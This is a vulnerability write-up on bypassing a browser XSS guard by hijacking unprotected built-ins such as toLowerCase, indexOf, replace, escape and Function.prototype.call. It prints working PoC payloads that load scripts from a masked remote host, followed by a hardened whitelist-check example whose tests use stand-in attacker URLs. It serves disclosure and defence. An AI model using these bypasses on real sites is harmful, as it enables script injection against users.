Several bypass points in the X-SS browser guard
The browser guard implements front-end XSS protection through a JavaScript hook mechanism. The product is good and performs well, but it still has some shortcomings.
Posted on Drops: http://**.**.**.**/web/10636. The browser guard has since fixed the problems reported there, but testing still turned up some issues.
The browser guard monitors front-end pages with JS hook technology, and its interception code is wrapped in one large closure, so the only way in is through global variables. Working from hxj.min.js, bypasses were found; the guard does protect some functions:
Object.defineProperty is used to implement that protection, so the protected function objects cannot be hijacked.
1. No toLowerCase protection
The Hook_Source module monitors external sources. During the comparison it converts with toLowerCase, but that function is not protected in the code, so the check is bypassed by hijacking toLowerCase.
(1) Bypass code:

    String.prototype.toLowerCase = function (e) { return 'shit'; };
    var s = document.createElement('script');
    s.src = 'HTTP://**.**.**.**/R4p6BE2';
    document.body.appendChild(s);

(2) Test URL (only the injected code is shown):

    **.**/Browser/test.php?T="; String.prototype.toLowerCase = function (e) { return 'shit'; }; s = document.createElement('script'); document.body.appendChild(s); s.src = 'HTTP://**.**.**.**/R4p6BE2'; //

No alert is reported on the X-SS platform.
2. Bypass via the Check_domain function
When src is verified, Check_domain checks whether the URL in src belongs to the configured whitelist. Looking at the logic of this function, the code protects neither indexOf nor replace, so the following two bypasses exist:
(1) Hijack replace
Test code:

    var _replace = String.prototype.replace;
    String.prototype.replace = function () { return 'test'; };
    s = document.createElement('script');
    document.body.appendChild(s);
    s.src = 'HTTP://**.**.**.**/R4p6BE2';

(2) Hijack indexOf: Check_domain ignores the chrome-extension:// domain. The PoC is structured as follows:

    var _indexof = String.prototype.indexOf;
    String.prototype.indexOf = function (val) {
        // make every URL look like a chrome-extension:// one, which Check_domain skips
        if (val === 'chrome-extension://') { return 0; }
        return _indexof.apply(this, arguments);
    };
    s = document.createElement('script');
    document.body.appendChild(s);
    s.src = 'HTTP://**.**.**.**/r4p6be2';

3. Bypassing the XSSTest module
The XSSTest module blocks test-type XSS such as alert and prompt, and it can also be bypassed:
In the module, alert, confirm and prompt are overwritten, and an alarm is raised before the call, but escape is used for the encoding. Looking at the Report function, the parameter e is checked, so we overwrite escape: if it always returns null, no alert is triggered.

    window.escape = function () { return null; };
    s = document.createElement('script');
    document.body.appendChild(s);
    s.src = 'HTTP://**.**.**.**/R4p6BE2';

4. Fancy bypass by hijacking call
Finally, the browser guard code calls the native interfaces through call, but does not protect apply/call themselves, so the original interfaces can be obtained by hijacking the call function. The code is as follows:

    var w = window;
    var d = document;
    var _call = Function.prototype.call;
    Function.prototype.call = function () {
        if (arguments.length === 0) { return; }
        // the guard's hooks invoke the native functions through call; capture them
        if (this.name === 'createElement') { if (!w._create) { w._create = this; } }
        if (this.name === 'setAttribute') { if (!w._setAttribute) { w._setAttribute = this; } }
        return _call.apply(this, arguments);
    };
    s = d.createElement('img').src = '/X';          // triggers the hooks so the natives get captured
    s = _create.call(document, 'script');
    Object.defineProperty(s, 'src', {
        get: function () { return 'chrome-extension://'; },
        set: function (e) { _setAttribute.call(s, 'src', e); }
    });
    s.src = 'HTTP://**.**.**.**/browser/edevil.js';
    d.body.appendChild(s);

The trick here is to call the original interface _create to bypass createElement, and to define a getter/setter on the script element's src to bypass the Check_domain detection.
Solution:
Complete the object protection: protect every function the guard relies on, not just a subset.
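The fix the write-up calls complete object protection comes down to one rule: a guard must never look up a built-in through a prototype that page scripts can still modify. The added example below (not code from the browser guard, hxj.min.js, or its author) shows a Check_domain-style whitelist check written that way, then re-runs it with the toLowerCase, indexOf and call overwrites from sections 1, 2 and 4 in place; the same binding rule applies to the escape call in the Report function of section 3. The whitelist, the page origin and all URLs are constructed, and the example assumes the guard runs before any page script, so its bindings are taken from pristine prototypes.

```javascript
// Added example (not code from the browser guard or its author): a script-src
// whitelist check that binds every built-in it depends on once, at load time,
// and calls them only through those bindings. Overwriting
// String.prototype.toLowerCase / indexOf / replace, window.escape or
// Function.prototype.call afterwards then has no effect on the verdict.
// The whitelist, the page origin and all URLs below are constructed.

// Bindings taken while the prototypes are still pristine (the guard is assumed
// to load before any page script).
const N = Object.freeze({
  apply: Reflect.apply,
  URL: globalThis.URL,
  protocol: Object.getOwnPropertyDescriptor(URL.prototype, 'protocol').get,
  hostname: Object.getOwnPropertyDescriptor(URL.prototype, 'hostname').get,
  toLowerCase: String.prototype.toLowerCase,
  includes: Array.prototype.includes,
});

// Invoke through the saved Reflect.apply, never through fn.call / fn.apply,
// which the write-up shows being replaced.
function invoke(fn, thisArg, ...args) {
  return N.apply(fn, thisArg, args);
}

const PAGE_ORIGIN = 'https://page.example/';                               // constructed
const WHITELIST = Object.freeze(['page.example', 'static.example.com']);  // constructed

// True only for http(s) URLs whose hostname is on the whitelist. Relative and
// scheme-relative ('//host/x') URLs are resolved against the page origin;
// every other scheme (chrome-extension:, data:, javascript:, ...) is refused
// instead of being skipped, which is the gap the indexOf bypass used.
function checkDomain(src, whitelist = WHITELIST) {
  if (typeof src !== 'string') return false;
  let u;
  try {
    u = new N.URL(src, PAGE_ORIGIN);
  } catch (e) {
    return false; // unparseable URL: refuse
  }
  const scheme = invoke(N.protocol, u);
  if (scheme !== 'http:' && scheme !== 'https:') return false;
  // URL already lower-cases the host; the bound toLowerCase stands in for the
  // normalisation step the guard performs, now immune to hijacking.
  const host = invoke(N.toLowerCase, invoke(N.hostname, u));
  return invoke(N.includes, whitelist, host);
}

// The same prototype overwrites the write-up reports, applied after the guard
// initialised and undone afterwards. The verdicts are identical to the
// untampered ones because checkDomain never consults the prototypes.
function verdictsUnderHijack() {
  const saved = {
    toLowerCase: String.prototype.toLowerCase,
    indexOf: String.prototype.indexOf,
    call: Function.prototype.call,
  };
  String.prototype.toLowerCase = function () { return 'x'; };
  String.prototype.indexOf = function () { return 0; };
  Function.prototype.call = function () { return undefined; };
  try {
    return {
      allowed: checkDomain('https://static.example.com/app.js'),            // true
      relative: checkDomain('/js/app.js'),                                   // true (page origin)
      caseHost: checkDomain('HTTP://STATIC.EXAMPLE.COM/app.js'),            // true
      remote: checkDomain('http://attacker.example/x.js'),                   // false
      extension: checkDomain('chrome-extension://abcdef/x.js'),             // false, not skipped
      userinfo: checkDomain('http://static.example.com@evil.example/x.js'), // false, host is evil.example
      data: checkDomain('data:text/javascript,1'),                           // false
    };
  } finally {
    String.prototype.toLowerCase = saved.toLowerCase;
    String.prototype.indexOf = saved.indexOf;
    Function.prototype.call = saved.call;
  }
}
```

Binding at load time is the complementary half of the Object.defineProperty protection the write-up mentions: making a prototype method non-writable stops later assignment, but only bindings taken before any page script runs guarantee that the guard itself calls the genuine built-in. Refusing every scheme other than http(s), rather than exempting chrome-extension://, closes the indexOf gap regardless of how the string methods behave.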